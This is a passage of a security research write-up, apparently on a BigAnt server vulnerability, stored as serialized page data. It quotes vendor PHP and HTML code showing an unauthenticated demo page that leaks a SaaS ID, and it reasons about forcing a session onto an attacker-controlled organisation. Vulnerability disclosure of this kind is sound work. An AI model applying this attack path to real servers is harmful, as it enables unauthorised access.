",[886,48848,48849],{},"sp_saas_id"," function can be found in ",[886,48852,48853],{},"Application\u002FCommon\u002FCommon\u002Fsite.php:143"," and corroborates this:",[1354,48856,48858],{"className":1367,"code":48857,"language":1369,"meta":219,"style":219},"function sp_saas_id(){\n if (! $_SESSION['saas'])\n return '';\n\n return $_SESSION['saas']['saas_id'];\n}\n",[886,48859,48860,48869,48893,48901,48905,48931],{"__ignoreMap":219},[1373,48861,48862,48864,48867],{"class":1375,"line":1376},[1373,48863,8560],{"class":7293},[1373,48865,48866],{"class":7297}," sp_saas_id",[1373,48868,47121],{"class":1383},[1373,48870,48871,48873,48875,48877,48879,48882,48884,48886,48889,48891],{"class":1375,"line":220},[1373,48872,4695],{"class":4636},[1373,48874,4641],{"class":1383},[1373,48876,16090],{"class":1397},[1373,48878,4656],{"class":1383},[1373,48880,48881],{"class":4640},"_SESSION",[1373,48883,7035],{"class":1383},[1373,48885,1388],{"class":1387},[1373,48887,48888],{"class":1391},"saas",[1373,48890,1388],{"class":1387},[1373,48892,11842],{"class":1383},[1373,48894,48895,48897,48899],{"class":1375,"line":1266},[1373,48896,4918],{"class":4636},[1373,48898,5571],{"class":1387},[1373,48900,4912],{"class":1383},[1373,48902,48903],{"class":1375,"line":1852},[1373,48904,6520],{"emptyLinePlaceholder":237},[1373,48906,48907,48909,48911,48913,48915,48917,48919,48921,48923,48925,48927,48929],{"class":1375,"line":4692},[1373,48908,7340],{"class":4636},[1373,48910,4656],{"class":1383},[1373,48912,48881],{"class":4640},[1373,48914,7035],{"class":1383},[1373,48916,1388],{"class":1387},[1373,48918,48888],{"class":1391},[1373,48920,1388],{"class":1387},[1373,48922,11832],{"class":1383},[1373,48924,1388],{"class":1387},[1373,48926,47076],{"class":1391},[1373,48928,1388],{"class":1387},[1373,48930,34699],{"class":1383},[1373,48932,48933],{"class":1375,"line":4724},[1373,48934,1855],{"class":1383},[18,48936,48937,48938,48940,48941,4606],{},"Some static analysis (ripgrep my dearest) allowed us to identify roughly ~200 instances of ",[886,48939,48849],{}," calls, and some more quick session checks narrow down any that don't require authentication. One entry stood out far more than the others in ",[886,48942,48943],{},"Application\u002FDemo\u002FView\u002FApi\u002Findex.html",[1354,48945,48947],{"className":8228,"code":48946,"language":8230,"meta":219,"style":219},"\u003C!DOCTYPE html>\n\u003Chtml>\n \u003Chead>\n \u003Cmeta charset=\"utf-8\">\n \u003Clink href=\"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Fcss\u002Fbootstrap.min.css\" rel=\"stylesheet\">\n \u003Clink href=\"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Ffont-awesome\u002F4.2.0\u002Fcss\u002Ffont-awesome.min.css\" rel=\"stylesheet\" type=\"text\u002Fcss\">\n \u003Clink href=\"__PUBLIC__\u002F{$Think.MODULE_NAME}\u002Fcss\u002Fsite.css\" rel=\"stylesheet\">\n \u003Cscript src=\"__PUBLIC__\u002Fstatic\u002Fjquery.js\">\u003C\u002Fscript>\n \u003C\u002Fhead>\n \u003Cbody>\n \n \n \u003Cvolist name=\"list\" id=\"module\" key=\"i\">\n \u003Cvolist name=\"module['methods']\" id=\"method\">\n \u003Ca id=\"{$module['name']}_{$method['name']}\">\u003C\u002Fa>\n \u003Cform method=\"post\" target=\"_blank\" action=\"\u002Fapi\u002F{$module['name']}\u002F{$method['name']}.html\" enctype=\"multipart\u002Fform-data\">\n \u003Ch1>{$module['name']}\u002F{$method['name']}【{$method['intro']}】\u003C\u002Fh1>\n \u003Cdiv class=\"cmd\">\n \u003Ca href=\"#\" class=\"clear\">{:L('_CLEAN_SELECT_OPTIONS_')}\u003C\u002Fa>\n \u003C\u002Fdiv>\n \n \u003Cdiv class=\"item-option\">\n \u003Clabel> ssid\u003C\u002Flabel>\n \u003Cinput type=\"text\" name=\"ssid\" value=\"{:sp_saas_id()}\">\n \u003Cspan class=\"intro\">SAAS ID\u003C\u002Fspan>\n \u003C\u002Fdiv>\n \u003Cdiv class=\"item-option\">\n \u003Clabel>\u003Ci>*\u003C\u002Fi> uid\u003C\u002Flabel>\n",[886,48948,48949,48959,48967,48977,48998,49030,49071,49100,49125,49134,49142,49146,49150,49193,49223,49246,49299,49316,49334,49372,49380,49385,49404,49422,49463,49491,49499,49517],{"__ignoreMap":219},[1373,48950,48951,48953,48955,48957],{"class":1375,"line":1376},[1373,48952,6755],{"class":1383},[1373,48954,6758],{"class":6300},[1373,48956,6762],{"class":8252},[1373,48958,6765],{"class":1383},[1373,48960,48961,48963,48965],{"class":1375,"line":220},[1373,48962,11852],{"class":1383},[1373,48964,8230],{"class":6300},[1373,48966,6765],{"class":1383},[1373,48968,48969,48972,48975],{"class":1375,"line":1266},[1373,48970,48971],{"class":1383}," \u003C",[1373,48973,48974],{"class":6300},"head",[1373,48976,6765],{"class":1383},[1373,48978,48979,48981,48984,48987,48989,48991,48994,48996],{"class":1375,"line":1852},[1373,48980,8246],{"class":1383},[1373,48982,48983],{"class":6300},"meta",[1373,48985,48986],{"class":8252}," charset",[1373,48988,5417],{"class":1383},[1373,48990,183],{"class":1387},[1373,48992,48993],{"class":1391},"utf-8",[1373,48995,183],{"class":1387},[1373,48997,6765],{"class":1383},[1373,48999,49000,49002,49004,49007,49009,49011,49014,49016,49019,49021,49023,49026,49028],{"class":1375,"line":4692},[1373,49001,8246],{"class":1383},[1373,49003,30586],{"class":6300},[1373,49005,49006],{"class":8252}," href",[1373,49008,5417],{"class":1383},[1373,49010,183],{"class":1387},[1373,49012,49013],{"class":1391},"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Fcss\u002Fbootstrap.min.css",[1373,49015,183],{"class":1387},[1373,49017,49018],{"class":8252}," rel",[1373,49020,5417],{"class":1383},[1373,49022,183],{"class":1387},[1373,49024,49025],{"class":1391},"stylesheet",[1373,49027,183],{"class":1387},[1373,49029,6765],{"class":1383},[1373,49031,49032,49034,49036,49038,49040,49042,49045,49047,49050,49052,49054,49056,49058,49060,49062,49064,49067,49069],{"class":1375,"line":4724},[1373,49033,8246],{"class":1383},[1373,49035,30586],{"class":6300},[1373,49037,49006],{"class":8252},[1373,49039,5417],{"class":1383},[1373,49041,183],{"class":1387},[1373,49043,49044],{"class":1391},"__PUBLIC__\u002Fstatic\u002Fbootstrap\u002Ffont-awesome\u002F4.2.0\u002Fcss\u002Ffont-awesome.min.css",[1373,49046,183],{"class":1387},[1373,49048,49049],{"class":8252}," rel",[1373,49051,5417],{"class":1383},[1373,49053,183],{"class":1387},[1373,49055,49025],{"class":1391},[1373,49057,183],{"class":1387},[1373,49059,8253],{"class":8252},[1373,49061,5417],{"class":1383},[1373,49063,183],{"class":1387},[1373,49065,49066],{"class":1391},"text\u002Fcss",[1373,49068,183],{"class":1387},[1373,49070,6765],{"class":1383},[1373,49072,49073,49075,49077,49079,49081,49083,49086,49088,49090,49092,49094,49096,49098],{"class":1375,"line":4756},[1373,49074,8246],{"class":1383},[1373,49076,30586],{"class":6300},[1373,49078,49006],{"class":8252},[1373,49080,5417],{"class":1383},[1373,49082,183],{"class":1387},[1373,49084,49085],{"class":1391},"__PUBLIC__\u002F{$Think.MODULE_NAME}\u002Fcss\u002Fsite.css",[1373,49087,183],{"class":1387},[1373,49089,49018],{"class":8252},[1373,49091,5417],{"class":1383},[1373,49093,183],{"class":1387},[1373,49095,49025],{"class":1391},[1373,49097,183],{"class":1387},[1373,49099,6765],{"class":1383},[1373,49101,49102,49104,49106,49109,49111,49113,49116,49118,49121,49123],{"class":1375,"line":4768},[1373,49103,8246],{"class":1383},[1373,49105,8249],{"class":6300},[1373,49107,49108],{"class":8252}," src",[1373,49110,5417],{"class":1383},[1373,49112,183],{"class":1387},[1373,49114,49115],{"class":1391},"__PUBLIC__\u002Fstatic\u002Fjquery.js",[1373,49117,183],{"class":1387},[1373,49119,49120],{"class":1383},">\u003C\u002F",[1373,49122,8249],{"class":6300},[1373,49124,6765],{"class":1383},[1373,49126,49127,49130,49132],{"class":1375,"line":4792},[1373,49128,49129],{"class":1383}," \u003C\u002F",[1373,49131,48974],{"class":6300},[1373,49133,6765],{"class":1383},[1373,49135,49136,49138,49140],{"class":1375,"line":4798},[1373,49137,48971],{"class":1383},[1373,49139,20718],{"class":6300},[1373,49141,6765],{"class":1383},[1373,49143,49144],{"class":1375,"line":4806},[1373,49145,47181],{"class":4640},[1373,49147,49148],{"class":1375,"line":4817},[1373,49149,47181],{"class":4640},[1373,49151,49152,49154,49157,49159,49161,49163,49166,49168,49170,49172,49174,49177,49179,49182,49184,49186,49189,49191],{"class":1375,"line":4825},[1373,49153,8246],{"class":1383},[1373,49155,49156],{"class":46492},"volist",[1373,49158,46496],{"class":8252},[1373,49160,5417],{"class":1383},[1373,49162,183],{"class":1387},[1373,49164,49165],{"class":1391},"list",[1373,49167,183],{"class":1387},[1373,49169,7911],{"class":8252},[1373,49171,5417],{"class":1383},[1373,49173,183],{"class":1387},[1373,49175,49176],{"class":1391},"module",[1373,49178,183],{"class":1387},[1373,49180,49181],{"class":8252}," key",[1373,49183,5417],{"class":1383},[1373,49185,183],{"class":1387},[1373,49187,49188],{"class":1391},"i",[1373,49190,183],{"class":1387},[1373,49192,6765],{"class":1383},[1373,49194,49195,49197,49199,49201,49203,49205,49208,49210,49212,49214,49216,49219,49221],{"class":1375,"line":4835},[1373,49196,46606],{"class":1383},[1373,49198,49156],{"class":46492},[1373,49200,46496],{"class":8252},[1373,49202,5417],{"class":1383},[1373,49204,183],{"class":1387},[1373,49206,49207],{"class":1391},"module['methods']",[1373,49209,183],{"class":1387},[1373,49211,7911],{"class":8252},[1373,49213,5417],{"class":1383},[1373,49215,183],{"class":1387},[1373,49217,49218],{"class":1391},"method",[1373,49220,183],{"class":1387},[1373,49222,6765],{"class":1383},[1373,49224,49225,49227,49229,49231,49233,49235,49238,49240,49242,49244],{"class":1375,"line":4843},[1373,49226,46655],{"class":1383},[1373,49228,47],{"class":6300},[1373,49230,7911],{"class":8252},[1373,49232,5417],{"class":1383},[1373,49234,183],{"class":1387},[1373,49236,49237],{"class":1391},"{$module['name']}_{$method['name']}",[1373,49239,183],{"class":1387},[1373,49241,49120],{"class":1383},[1373,49243,47],{"class":6300},[1373,49245,6765],{"class":1383},[1373,49247,49248,49250,49252,49254,49256,49258,49260,49262,49265,49267,49269,49271,49273,49276,49278,49280,49283,49285,49288,49290,49292,49295,49297],{"class":1375,"line":4849},[1373,49249,46655],{"class":1383},[1373,49251,21325],{"class":6300},[1373,49253,46570],{"class":8252},[1373,49255,5417],{"class":1383},[1373,49257,183],{"class":1387},[1373,49259,46577],{"class":1391},[1373,49261,183],{"class":1387},[1373,49263,49264],{"class":8252}," target",[1373,49266,5417],{"class":1383},[1373,49268,183],{"class":1387},[1373,49270,10881],{"class":1391},[1373,49272,183],{"class":1387},[1373,49274,49275],{"class":8252}," action",[1373,49277,5417],{"class":1383},[1373,49279,183],{"class":1387},[1373,49281,49282],{"class":1391},"\u002Fapi\u002F{$module['name']}\u002F{$method['name']}.html",[1373,49284,183],{"class":1387},[1373,49286,49287],{"class":8252}," enctype",[1373,49289,5417],{"class":1383},[1373,49291,183],{"class":1387},[1373,49293,49294],{"class":1391},"multipart\u002Fform-data",[1373,49296,183],{"class":1387},[1373,49298,6765],{"class":1383},[1373,49300,49301,49303,49305,49307,49310,49312,49314],{"class":1375,"line":4877},[1373,49302,46674],{"class":1383},[1373,49304,1920],{"class":6300},[1373,49306,5384],{"class":1383},[1373,49308,49309],{"class":4640},"{$module['name']}\u002F{$method['name']}【{$method['intro']}】",[1373,49311,46627],{"class":1383},[1373,49313,1920],{"class":6300},[1373,49315,6765],{"class":1383},[1373,49317,49318,49320,49322,49324,49326,49328,49330,49332],{"class":1375,"line":4915},[1373,49319,46674],{"class":1383},[1373,49321,46588],{"class":6300},[1373,49323,27205],{"class":8252},[1373,49325,5417],{"class":1383},[1373,49327,183],{"class":1387},[1373,49329,17653],{"class":1391},[1373,49331,183],{"class":1387},[1373,49333,6765],{"class":1383},[1373,49335,49336,49338,49340,49342,49344,49346,49348,49350,49352,49354,49356,49359,49361,49363,49366,49368,49370],{"class":1375,"line":4931},[1373,49337,46694],{"class":1383},[1373,49339,47],{"class":6300},[1373,49341,49006],{"class":8252},[1373,49343,5417],{"class":1383},[1373,49345,183],{"class":1387},[1373,49347,9452],{"class":1391},[1373,49349,183],{"class":1387},[1373,49351,27205],{"class":8252},[1373,49353,5417],{"class":1383},[1373,49355,183],{"class":1387},[1373,49357,49358],{"class":1391},"clear",[1373,49360,183],{"class":1387},[1373,49362,5384],{"class":1383},[1373,49364,49365],{"class":4640},"{:L('_CLEAN_SELECT_OPTIONS_')}",[1373,49367,46627],{"class":1383},[1373,49369,47],{"class":6300},[1373,49371,6765],{"class":1383},[1373,49373,49374,49376,49378],{"class":1375,"line":4947},[1373,49375,46779],{"class":1383},[1373,49377,46588],{"class":6300},[1373,49379,6765],{"class":1383},[1373,49381,49382],{"class":1375,"line":4952},[1373,49383,49384],{"class":4640}," \n",[1373,49386,49387,49389,49391,49393,49395,49397,49400,49402],{"class":1375,"line":6776},[1373,49388,46674],{"class":1383},[1373,49390,46588],{"class":6300},[1373,49392,27205],{"class":8252},[1373,49394,5417],{"class":1383},[1373,49396,183],{"class":1387},[1373,49398,49399],{"class":1391},"item-option",[1373,49401,183],{"class":1387},[1373,49403,6765],{"class":1383},[1373,49405,49406,49408,49411,49413,49416,49418,49420],{"class":1375,"line":6781},[1373,49407,46694],{"class":1383},[1373,49409,49410],{"class":6300},"label",[1373,49412,5384],{"class":1383},[1373,49414,49415],{"class":4640}," ssid",[1373,49417,46627],{"class":1383},[1373,49419,49410],{"class":6300},[1373,49421,6765],{"class":1383},[1373,49423,49424,49426,49428,49430,49432,49434,49436,49438,49440,49442,49444,49447,49449,49452,49454,49456,49459,49461],{"class":1375,"line":7524},[1373,49425,46694],{"class":1383},[1373,49427,15129],{"class":6300},[1373,49429,8253],{"class":8252},[1373,49431,5417],{"class":1383},[1373,49433,183],{"class":1387},[1373,49435,1359],{"class":1391},[1373,49437,183],{"class":1387},[1373,49439,46496],{"class":8252},[1373,49441,5417],{"class":1383},[1373,49443,183],{"class":1387},[1373,49445,49446],{"class":1391},"ssid",[1373,49448,183],{"class":1387},[1373,49450,49451],{"class":8252}," value",[1373,49453,5417],{"class":1383},[1373,49455,183],{"class":1387},[1373,49457,49458],{"class":1391},"{:sp_saas_id()}",[1373,49460,183],{"class":1387},[1373,49462,6765],{"class":1383},[1373,49464,49465,49467,49469,49471,49473,49475,49478,49480,49482,49485,49487,49489],{"class":1375,"line":7530},[1373,49466,46694],{"class":1383},[1373,49468,1373],{"class":6300},[1373,49470,27205],{"class":8252},[1373,49472,5417],{"class":1383},[1373,49474,183],{"class":1387},[1373,49476,49477],{"class":1391},"intro",[1373,49479,183],{"class":1387},[1373,49481,5384],{"class":1383},[1373,49483,49484],{"class":4640},"SAAS ID",[1373,49486,46627],{"class":1383},[1373,49488,1373],{"class":6300},[1373,49490,6765],{"class":1383},[1373,49492,49493,49495,49497],{"class":1375,"line":7546},[1373,49494,46779],{"class":1383},[1373,49496,46588],{"class":6300},[1373,49498,6765],{"class":1383},[1373,49500,49501,49503,49505,49507,49509,49511,49513,49515],{"class":1375,"line":7571},[1373,49502,46674],{"class":1383},[1373,49504,46588],{"class":6300},[1373,49506,27205],{"class":8252},[1373,49508,5417],{"class":1383},[1373,49510,183],{"class":1387},[1373,49512,49399],{"class":1391},[1373,49514,183],{"class":1387},[1373,49516,6765],{"class":1383},[1373,49518,49519,49521,49523,49526,49528,49530,49532,49534,49536,49538,49541,49543,49545],{"class":1375,"line":7598},[1373,49520,46694],{"class":1383},[1373,49522,49410],{"class":6300},[1373,49524,49525],{"class":1383},">\u003C",[1373,49527,49188],{"class":6300},[1373,49529,5384],{"class":1383},[1373,49531,35613],{"class":4640},[1373,49533,46627],{"class":1383},[1373,49535,49188],{"class":6300},[1373,49537,5384],{"class":1383},[1373,49539,49540],{"class":4640}," uid",[1373,49542,46627],{"class":1383},[1373,49544,49410],{"class":6300},[1373,49546,6765],{"class":1383},[18,49548,49549,49550,49552],{},"Opening up this page in a empty session shows the following demo page, which contains almost all API calls but most importantly fills the forms with the called ",[886,49551,48849],{}," function call:",[18,49554,49555],{},[68,49556],{"alt":49557,"src":49558,":width":10862},"BigAnt demo page leaking sp_saas_id","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-4-demo-page.png",[18,49560,49561,49562,49564,49565,49568,49569,49572,49573,49575],{},"What's up with the ",[886,49563,49446],{}," UUID value of ",[886,49566,49567],{},"122C8BFA-BD74-9668-BE31-EA159FB2C437"," and why is that the UUID tied to a ",[886,49570,49571],{},"antdbms_pwn"," object from the previous database ",[886,49574,48156],{}," query? Where did it come from?",[18,49577,49578,49579,49581,49582,49584],{},"It turns out that SaaS ID from the application gets assigned to the first created ",[886,49580,48888],{}," organization and if your role or session does not have a currently assigned one, the first created one is set as the default. This presents a problem, we cannot retrieve the information that we submitted when registering when submitting the organization registration because that object will get assigned and we don't know the email, org name, and password for that organization. Theoretically, if the attacker creates the first organization this would be a usable path, but we want something better. Let's see if we can find a way to force a session to belong to a ",[886,49583,48888],{}," org with our controlled information and grantee success.",[61,49586,49588],{"id":49587},"forcing-saas-session","Forcing SaaS Session",[18,49590,49591,49592,4606],{},"This time, we weren't quite as lucky to find a session assigned variable in a debug page, nor a quick function call. Looking for all interactions with identified SaaS variable names gave us quite a few places to look. Ironically, some manual review showed that the primary login page index function contained some suspicious looking code at ",[886,49593,49594],{},"Application\u002FHome\u002FController\u002FLoginController.class.php:90",[1354,49596,49598],{"className":1367,"code":49597,"language":1369,"meta":219,"style":219},"\u002F**\n * 登录\n *\u002F\npublic function index(){\n\n $to = I('to','admin','htmlspecialchars') ;\n $app = I('app');\n $saas = I('saas');\n\n if (! $saas) {\n $saas = cookie('saas');\n }\n \n\n \n \u002F\u002F20170418 针对只有一个SAAS的企业,默认给出企业ID\n \u002F\u002F李成提的需求\n $M = D('Common\u002FSaas');\n $data = null ;\n if ($saas){\n \u002F\u002F20170518 如果是登妨系统管理台,那个数据库密码如果是 默认密码,那么显示出来\n $data = $M->where(array('saas_name'=>$saas))->fetchSql(false)->select();\n }\n\n \u002F\u002F\n if (! $data){\n $data = $M->fetchSql(false)->select();\n } \n\n \n $saas = $data[0]['saas_name'] ;\n\n \n\n \u002F\u002F20170419 加入默认的帐号\n $account = htmlspecialchars($_COOKIE['account']) ;\n if (! $account){\n $account = 'superadmin';\n }\n \n \n $this->assign('saas',$saas) ;\n $this->assign('account',$account) ;\n $this->assign('metaTitle',C('PRODUCT_NAME') . ' ' . L('_LOGIN_TITLE_')) ;\n $this->assign('to',$to) ;\n $this->assign('app',$app) ;\n \n if(I('flag')){\n $this->assign('flag',I('flag')) ;\n }\n",[886,49599,49600,49604,49609,49613,49624,49628,49670,49692,49713,49717,49733,49754,49758,49762,49766,49770,49775,49780,49800,49812,49822,49827,49881,49885,49889,49894,49908,49936,49942,49946,49950,49978,49982,49986,49990,49995,50025,50039,50056,50060,50064,50068,50094,50118,50174,50198,50222,50226,50246,50278],{"__ignoreMap":219},[1373,49601,49602],{"class":1375,"line":1376},[1373,49603,47086],{"class":4630},[1373,49605,49606],{"class":1375,"line":220},[1373,49607,49608],{"class":4630}," * 登录\n",[1373,49610,49611],{"class":1375,"line":1266},[1373,49612,47111],{"class":4630},[1373,49614,49615,49617,49620,49622],{"class":1375,"line":1852},[1373,49616,15019],{"class":4652},[1373,49618,49619],{"class":7293}," function",[1373,49621,38984],{"class":7297},[1373,49623,47121],{"class":1383},[1373,49625,49626],{"class":1375,"line":4692},[1373,49627,6520],{"emptyLinePlaceholder":237},[1373,49629,49630,49632,49635,49637,49640,49642,49644,49647,49649,49651,49653,49655,49657,49659,49661,49664,49666,49668],{"class":1375,"line":4724},[1373,49631,7362],{"class":1383},[1373,49633,49634],{"class":4640},"to ",[1373,49636,5417],{"class":1397},[1373,49638,49639],{"class":7297}," I",[1373,49641,1384],{"class":1383},[1373,49643,1388],{"class":1387},[1373,49645,49646],{"class":1391},"to",[1373,49648,1388],{"class":1387},[1373,49650,5437],{"class":1383},[1373,49652,1388],{"class":1387},[1373,49654,5800],{"class":1391},[1373,49656,1388],{"class":1387},[1373,49658,5437],{"class":1383},[1373,49660,1388],{"class":1387},[1373,49662,49663],{"class":1391},"htmlspecialchars",[1373,49665,1388],{"class":1387},[1373,49667,2230],{"class":1383},[1373,49669,47289],{"class":1383},[1373,49671,49672,49674,49677,49679,49681,49683,49685,49688,49690],{"class":1375,"line":4756},[1373,49673,7362],{"class":1383},[1373,49675,49676],{"class":4640},"app ",[1373,49678,5417],{"class":1397},[1373,49680,49639],{"class":7297},[1373,49682,1384],{"class":1383},[1373,49684,1388],{"class":1387},[1373,49686,49687],{"class":1391},"app",[1373,49689,1388],{"class":1387},[1373,49691,4680],{"class":1383},[1373,49693,49694,49696,49699,49701,49703,49705,49707,49709,49711],{"class":1375,"line":4768},[1373,49695,7362],{"class":1383},[1373,49697,49698],{"class":4640},"saas ",[1373,49700,5417],{"class":1397},[1373,49702,49639],{"class":7297},[1373,49704,1384],{"class":1383},[1373,49706,1388],{"class":1387},[1373,49708,48888],{"class":1391},[1373,49710,1388],{"class":1387},[1373,49712,4680],{"class":1383},[1373,49714,49715],{"class":1375,"line":4792},[1373,49716,6520],{"emptyLinePlaceholder":237},[1373,49718,49719,49721,49723,49725,49727,49729,49731],{"class":1375,"line":4798},[1373,49720,4695],{"class":4636},[1373,49722,4641],{"class":1383},[1373,49724,16090],{"class":1397},[1373,49726,4656],{"class":1383},[1373,49728,48888],{"class":4640},[1373,49730,2230],{"class":1383},[1373,49732,4765],{"class":1383},[1373,49734,49735,49737,49739,49741,49744,49746,49748,49750,49752],{"class":1375,"line":4806},[1373,49736,4727],{"class":1383},[1373,49738,49698],{"class":4640},[1373,49740,5417],{"class":1397},[1373,49742,49743],{"class":7297}," cookie",[1373,49745,1384],{"class":1383},[1373,49747,1388],{"class":1387},[1373,49749,48888],{"class":1391},[1373,49751,1388],{"class":1387},[1373,49753,4680],{"class":1383},[1373,49755,49756],{"class":1375,"line":4817},[1373,49757,4795],{"class":1383},[1373,49759,49760],{"class":1375,"line":4825},[1373,49761,47181],{"class":4640},[1373,49763,49764],{"class":1375,"line":4835},[1373,49765,6520],{"emptyLinePlaceholder":237},[1373,49767,49768],{"class":1375,"line":4843},[1373,49769,47181],{"class":4640},[1373,49771,49772],{"class":1375,"line":4849},[1373,49773,49774],{"class":4630}," \u002F\u002F20170418 针对只有一个SAAS的企业,默认给出企业ID\n",[1373,49776,49777],{"class":1375,"line":4877},[1373,49778,49779],{"class":4630}," \u002F\u002F李成提的需求\n",[1373,49781,49782,49784,49786,49788,49790,49792,49794,49796,49798],{"class":1375,"line":4915},[1373,49783,7362],{"class":1383},[1373,49785,47697],{"class":4640},[1373,49787,5417],{"class":1397},[1373,49789,47702],{"class":7297},[1373,49791,1384],{"class":1383},[1373,49793,1388],{"class":1387},[1373,49795,47709],{"class":1391},[1373,49797,1388],{"class":1387},[1373,49799,4680],{"class":1383},[1373,49801,49802,49804,49806,49808,49810],{"class":1375,"line":4931},[1373,49803,7362],{"class":1383},[1373,49805,47772],{"class":4640},[1373,49807,5417],{"class":1397},[1373,49809,15680],{"class":7054},[1373,49811,47289],{"class":1383},[1373,49813,49814,49816,49818,49820],{"class":1375,"line":4947},[1373,49815,4695],{"class":4636},[1373,49817,47425],{"class":1383},[1373,49819,48888],{"class":4640},[1373,49821,47430],{"class":1383},[1373,49823,49824],{"class":1375,"line":4952},[1373,49825,49826],{"class":4630}," \u002F\u002F20170518 如果是登妨系统管理台,那个数据库密码如果是 默认密码,那么显示出来\n",[1373,49828,49829,49831,49833,49835,49837,49839,49841,49843,49845,49847,49849,49851,49853,49855,49857,49859,49861,49863,49865,49868,49870,49872,49874,49876,49879],{"class":1375,"line":6776},[1373,49830,4727],{"class":1383},[1373,49832,47772],{"class":4640},[1373,49834,5417],{"class":1397},[1373,49836,4656],{"class":1383},[1373,49838,47367],{"class":4640},[1373,49840,4667],{"class":1397},[1373,49842,47926],{"class":7297},[1373,49844,1384],{"class":1383},[1373,49846,47234],{"class":1379},[1373,49848,1384],{"class":1383},[1373,49850,1388],{"class":1387},[1373,49852,46826],{"class":1391},[1373,49854,1388],{"class":1387},[1373,49856,47245],{"class":1397},[1373,49858,4644],{"class":1383},[1373,49860,48888],{"class":4640},[1373,49862,27548],{"class":1383},[1373,49864,4667],{"class":1397},[1373,49866,49867],{"class":7297},"fetchSql",[1373,49869,1384],{"class":1383},[1373,49871,5971],{"class":7054},[1373,49873,2230],{"class":1383},[1373,49875,4667],{"class":1397},[1373,49877,49878],{"class":7297},"select",[1373,49880,15603],{"class":1383},[1373,49882,49883],{"class":1375,"line":6781},[1373,49884,4795],{"class":1383},[1373,49886,49887],{"class":1375,"line":7524},[1373,49888,6520],{"emptyLinePlaceholder":237},[1373,49890,49891],{"class":1375,"line":7530},[1373,49892,49893],{"class":4630}," \u002F\u002F\n",[1373,49895,49896,49898,49900,49902,49904,49906],{"class":1375,"line":7546},[1373,49897,4695],{"class":4636},[1373,49899,4641],{"class":1383},[1373,49901,16090],{"class":1397},[1373,49903,4656],{"class":1383},[1373,49905,9156],{"class":4640},[1373,49907,47430],{"class":1383},[1373,49909,49910,49912,49914,49916,49918,49920,49922,49924,49926,49928,49930,49932,49934],{"class":1375,"line":7571},[1373,49911,4727],{"class":1383},[1373,49913,47772],{"class":4640},[1373,49915,5417],{"class":1397},[1373,49917,4656],{"class":1383},[1373,49919,47367],{"class":4640},[1373,49921,4667],{"class":1397},[1373,49923,49867],{"class":7297},[1373,49925,1384],{"class":1383},[1373,49927,5971],{"class":7054},[1373,49929,2230],{"class":1383},[1373,49931,4667],{"class":1397},[1373,49933,49878],{"class":7297},[1373,49935,15603],{"class":1383},[1373,49937,49938,49940],{"class":1375,"line":7598},[1373,49939,28032],{"class":1383},[1373,49941,19298],{"class":4640},[1373,49943,49944],{"class":1375,"line":7615},[1373,49945,6520],{"emptyLinePlaceholder":237},[1373,49947,49948],{"class":1375,"line":7635},[1373,49949,47181],{"class":4640},[1373,49951,49952,49954,49956,49958,49960,49962,49964,49966,49968,49970,49972,49974,49976],{"class":1375,"line":7640},[1373,49953,7362],{"class":1383},[1373,49955,49698],{"class":4640},[1373,49957,5417],{"class":1397},[1373,49959,4656],{"class":1383},[1373,49961,9156],{"class":4640},[1373,49963,7035],{"class":1383},[1373,49965,445],{"class":5467},[1373,49967,11832],{"class":1383},[1373,49969,1388],{"class":1387},[1373,49971,46826],{"class":1391},[1373,49973,1388],{"class":1387},[1373,49975,15050],{"class":1383},[1373,49977,47289],{"class":1383},[1373,49979,49980],{"class":1375,"line":7648},[1373,49981,6520],{"emptyLinePlaceholder":237},[1373,49983,49984],{"class":1375,"line":7672},[1373,49985,47181],{"class":4640},[1373,49987,49988],{"class":1375,"line":7688},[1373,49989,6520],{"emptyLinePlaceholder":237},[1373,49991,49992],{"class":1375,"line":7709},[1373,49993,49994],{"class":4630}," \u002F\u002F20170419 加入默认的帐号\n",[1373,49996,49997,49999,50002,50004,50007,50009,50012,50014,50016,50019,50021,50023],{"class":1375,"line":7714},[1373,49998,7362],{"class":1383},[1373,50000,50001],{"class":4640},"account ",[1373,50003,5417],{"class":1397},[1373,50005,50006],{"class":1379}," htmlspecialchars",[1373,50008,34467],{"class":1383},[1373,50010,50011],{"class":4640},"_COOKIE",[1373,50013,7035],{"class":1383},[1373,50015,1388],{"class":1387},[1373,50017,50018],{"class":1391},"account",[1373,50020,1388],{"class":1387},[1373,50022,48026],{"class":1383},[1373,50024,47289],{"class":1383},[1373,50026,50027,50029,50031,50033,50035,50037],{"class":1375,"line":7722},[1373,50028,4695],{"class":4636},[1373,50030,4641],{"class":1383},[1373,50032,16090],{"class":1397},[1373,50034,4656],{"class":1383},[1373,50036,50018],{"class":4640},[1373,50038,47430],{"class":1383},[1373,50040,50041,50043,50045,50047,50049,50052,50054],{"class":1375,"line":9903},[1373,50042,4727],{"class":1383},[1373,50044,50001],{"class":4640},[1373,50046,5417],{"class":1397},[1373,50048,4713],{"class":1387},[1373,50050,50051],{"class":1391},"superadmin",[1373,50053,1388],{"class":1387},[1373,50055,4912],{"class":1383},[1373,50057,50058],{"class":1375,"line":9908},[1373,50059,4795],{"class":1383},[1373,50061,50062],{"class":1375,"line":9913},[1373,50063,47181],{"class":4640},[1373,50065,50066],{"class":1375,"line":9932},[1373,50067,47181],{"class":4640},[1373,50069,50070,50073,50075,50078,50080,50082,50084,50086,50088,50090,50092],{"class":1375,"line":9937},[1373,50071,50072],{"class":34505}," $this",[1373,50074,4667],{"class":1397},[1373,50076,50077],{"class":7297},"assign",[1373,50079,1384],{"class":1383},[1373,50081,1388],{"class":1387},[1373,50083,48888],{"class":1391},[1373,50085,1388],{"class":1387},[1373,50087,47335],{"class":1383},[1373,50089,48888],{"class":4640},[1373,50091,2230],{"class":1383},[1373,50093,47289],{"class":1383},[1373,50095,50096,50098,50100,50102,50104,50106,50108,50110,50112,50114,50116],{"class":1375,"line":9957},[1373,50097,50072],{"class":34505},[1373,50099,4667],{"class":1397},[1373,50101,50077],{"class":7297},[1373,50103,1384],{"class":1383},[1373,50105,1388],{"class":1387},[1373,50107,50018],{"class":1391},[1373,50109,1388],{"class":1387},[1373,50111,47335],{"class":1383},[1373,50113,50018],{"class":4640},[1373,50115,2230],{"class":1383},[1373,50117,47289],{"class":1383},[1373,50119,50120,50122,50124,50126,50128,50130,50133,50135,50137,50140,50142,50144,50147,50149,50151,50153,50155,50157,50159,50161,50163,50165,50168,50170,50172],{"